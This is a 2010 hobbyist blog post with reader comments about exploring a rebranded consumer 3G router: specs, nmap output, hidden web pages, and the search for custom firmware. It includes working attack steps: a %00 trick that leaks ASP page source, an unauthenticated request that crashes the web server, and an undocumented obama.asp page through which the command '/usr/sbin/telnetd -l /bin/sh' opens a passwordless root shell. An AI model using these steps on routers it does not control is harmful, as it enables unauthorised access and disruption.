Ivo's blog

Hacks, code and random thoughts

Hacking the Zolid Mobile Router

written by ivo, on Jul 14, 2010 9:46:00 AM.

I recently bought a Zolid “wireless mobile router” at a local ALDI store. It’s a nifty little device with 2xUSB, 2xUTP, and b/g/n wireless. You can plug it directly in a socket or power it through micro usb. It also claims to have support for a wide range of 3G dongles so you can use it as a mobile 3G access point. It resembles some of the Linux plug servers like Sheevaplug and Guruplug. Here are some of my findings:

Versions

The Zolid (an ALDI brand) is a rebranded “Amigo 3R161N”, which is also sold by Solwise as the 3g11nmrw and as the E-Top 3r161n, though I can’t find it on the e-top website

Software details

As I expected, it runs linux:

Linux version 2.6.19 (root@localhost.localdomain) (gcc version 3.4.6-1.3.5) #1 Fri Feb 26 17:00:34 CST 2010

It has firmware “ver1.1.5″ installed.

It uses the “GoAheader-Webs” webserver

It uses Pure-FTPd as FTP server

Firmware

It didn’t ship with a firmware on the CD. Unisupport.net (responsible for Zolid support) doesn’t offer anything for download either, and neither does Amigo. However, Solwise does have two firmwares available at the bottom of their product page.

I haven’t yet succeeded in dissecting the firmware (which helps to find backdoors, exploits, and so on, and may provide an opportunity to create a customized firmware). I think it starts with a “config.dat” file, but I have to research this further.

Hacks, details

Appending a .asp url with %00 (other characters will also work, i.e. ///) will give you the unrendered source of the ASP page. I.e. http://192.168.1.132/status.asp%00

nmap reports the following open ports and fingerprint:

Interesting ports on default.fritz.box (192.168.1.132):
Not shown: 994 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
515/tcp   open  printer
49152/tcp open  unknown
MAC Address: 00:08:A1:C8:C9:C4 (CNet Technology)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=5.00%D=7/14%OT=21%CT=1%CU=32750%PV=Y%DS=1%G=Y%M=0008A1%TM=4C3D6DD
OS:3%P=i686-pc-linux-gnu)SEQ(SP=CE%GCD=1%ISR=CE%TI=Z%CI=Z%II=I%TS=U)OPS(O1=
OS:M5B4NNS%O2=M5B4NNS%O3=M5B4%O4=M5B4NNS%O5=M5B4NNS%O6=M5B4NNS)WIN(W1=16D0%
OS:W2=16D0%W3=16D0%W4=16D0%W5=16D0%W6=16D0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4N
OS:NS%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=4
OS:0%W=16D0%S=O%A=S+%F=AS%O=M5B4NNS%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T
OS:=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=
OS:0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(
OS:R=Y%DFI=N%T=40%CD=S)
I have been able to find the following additional pages that are not part of the current navigation:
  • opmode.asp
  • one_button.asp
  • ap_one_button.asp
  • wifi_one_button.asp
  • tcpipwan.asp
  • qos.asp
  • downloadserver.asp (*)
  • stats.asp
(*) may crash the internal web server.

Crashing the web server is easy (no authentication required):

wget 'http://192.168.1.132/goform/foo

Accessing “config.dat” will offer a download containing, I assume, the devices configuration. It’s probably related to the saveconf.asp page. This file resembles the start of the firmwares I’ve been able to find.

Update

Thanks to info provided by Remco van Mook I’ve found the a page on the Sapido gr-1102 which mentions an “obama.asp” page which also works on the Zolid, it allows you to exexcute arbitrary commands!

Executing /usr/sbin/telnetd -l /bin/sh as command will give you an immediate root shell through telnet.

Related links

Remaining questions

  • How can we dissect the firmware?
  • Shouldn’t there be sources and licenses be provided somewhere?
  • How can we hack/exploit this device?

Please keep an eye on this page for futher updates. Respond in the comments if you have found anything interesting

Comments

  • Hi Ivo,

    here are some more goodies. The same product is also on the market as:

    ‘palm server router PE8074′
    ‘7link AWR120g’
    ‘ Sapido GR-1102′

    And according to a Russian OpenWRT forum posting here: open-wrt.ru/forum/viewtopic.php?id=13610the internal hardware is pretty much identical to the Linksys WAP4400N and WRVS4400N devices, for which a full source tree is available.

    I’ll continue digging :)

    Comment by Remco — Jul 14, 2010 3:49:30 PM | # - re

  • Heye wow! I wish I’d spent an extra half hour digging through this yesterday. Obama - who’d have thought.

    Comment by Remco — Jul 15, 2010 2:55:07 PM | # - re

  • Hi Ivo,

    The MAC address (00:08:A1:xx:xx:xx) and the title of the list on
    www.unisupport.net/download/50673/approved_3g_dongles.pdf points to the direction of:
    www.cnet.com.tw/html/productCWR-935M-a.htm

    Comment by ahhing — Jul 23, 2010 12:34:50 AM | # - re

  • Some of the specs i gathered using obama.asp and then telnet:

    CPU: MIPS RTL8652 / R3000
    RAM: 23576 Kb

    Fun files? /bin/bittorrent.sh . /bin/ping6

    Content of /etc/hosts: 172.20.1.254 rtl8181.realtek.com.tw rtl8181

    So maybe rtl8181.sourceforge.net/ can run on it?

    Comment by Job Snijders — Jul 28, 2010 12:23:51 PM | # - re

  • Looking forward to hacking this device as well…

    https://forum.openwrt.org/viewtopic.php?id=25930

    My take on a similar device (only 1 USB, without NAS functions)…

    byfai.com/content/sapido-rb-1132-compact-wireless-router

    Cheers.

    Comment by Lo Yuk Fai — Aug 8, 2010 2:03:14 PM | # - re

  • @LoYukFai It’s very similar to the Zolid and Sapido GR-1102. Have you tried the obama.asp trick?

    I understand openwrt support is nearly complete, let’s hope it works for your device as well.

    Comment by ivo — Aug 9, 2010 8:19:17 AM | # - re

    • obama.asp works! However, telnetd prompts me for a password and I have no idea whatsover.

      Anyway, I have got some information via the web interface and posted them on forum.openwrt.org

      Pardon my ignorance, but what’s the OpenWrt status on this stuff…?

      BTW, I just noticed that my device makes some small buzzing noise during operation, does your do as well…?

      Comment by Lo Yuk Fai — Aug 12, 2010 7:35:55 PM | # - re

      • Are you executing the command “/usr/sbin/telnetd -l /bin/sh”? That should give you an immediate, passwordless rootshell.

        Keep an eye on aliosa27.net/blog/?p=26 for openwrt news - that’s all I know as well.

        No noises here…

        Comment by ivo — Aug 16, 2010 2:51:15 PM | # - re

  • Yes, that’s the command I executed.

    I’ll keep an eye on that blog post, thanks for the heads-up.

    I noticed that the small buzzing sound is only emitted during USB-power operation.

    Cheers.

    Comment by Lo Yuk Fai — Aug 17, 2010 2:41:15 PM | # - re

  • Hi,

    the Zolid router doesn’t recognize my NTFS partition on my external HD drive. It has 1 partition FAT32 and 1 NTFS. The FAT32 is recognized, the NTFS isn’t. Do you know how I can get the NTFS partition visible?

    Comment by john — Aug 23, 2010 2:00:37 PM | # - re

Leave a Reply

Latest Posts

Archive

Proudly powered by Zine.